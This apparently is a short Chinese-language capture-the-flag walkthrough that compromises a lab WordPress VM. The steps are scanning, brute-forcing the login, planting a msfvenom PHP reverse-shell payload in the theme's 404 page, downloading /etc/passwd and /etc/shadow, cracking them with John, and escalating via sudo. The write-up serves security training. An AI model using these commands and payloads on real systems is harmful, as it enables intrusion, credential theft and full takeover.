【CTF】暴力破解实战


kali:192.168.223.131
target:192.168.223.172

通过arp-scan -l获取目标IP为192.168.223.172,nmap扫描一下,发现开启21、22、80端口

nmap -p- -A 192.168.223.172

没东西出现,nikto扫一下

nikto -h http://192.168.223.172

扫出一个/secret,打开看一下是一个wordpress网站,根据常识登陆界面在wp-login.php

进入后台,但是不知道账号密码,通过msfconsole进行爆破

msfconsole
use /auxiliary/scanner/http/wordpress_login_enum
set username admin
set pass_file /usr/share/wordlists/dirb/common.txt   //加载字典
set fargeturi /secret/
set rhosts 192.168.223.172
exploit

发现爆破不出来,直接burp进行爆破,得知账号密码都是admin,admin

然后和之前一样生成木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f raw > /root/msfshell.php

生成木马写入后开启监听

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.223.131
set lport 4444
exploit

找到404页面,通过审计wordpress的CMS获取路径,此时目标上线

192.168.223.172/secret/wp-content/themes/twentyseventeen/404.php

在msfconsole中下载passwd和shadow文件到kali

download /etc/passwd
download /etc/shadow

开启新终端对两个文件进行合并,生成一个crack文件,此时将两个文件放到一块

unshadow passwd shadow > crack

使用john破解用户和密码为marlinspike,marlinspike

john crack

回到原来的msf界面

shell
python -c 'import pty;pty.spawn("/bin/bash")'
su - marlinspike
//输入密码后登陆进去
sudo -l
//发现三个ALL,直接提权
sudo su

相关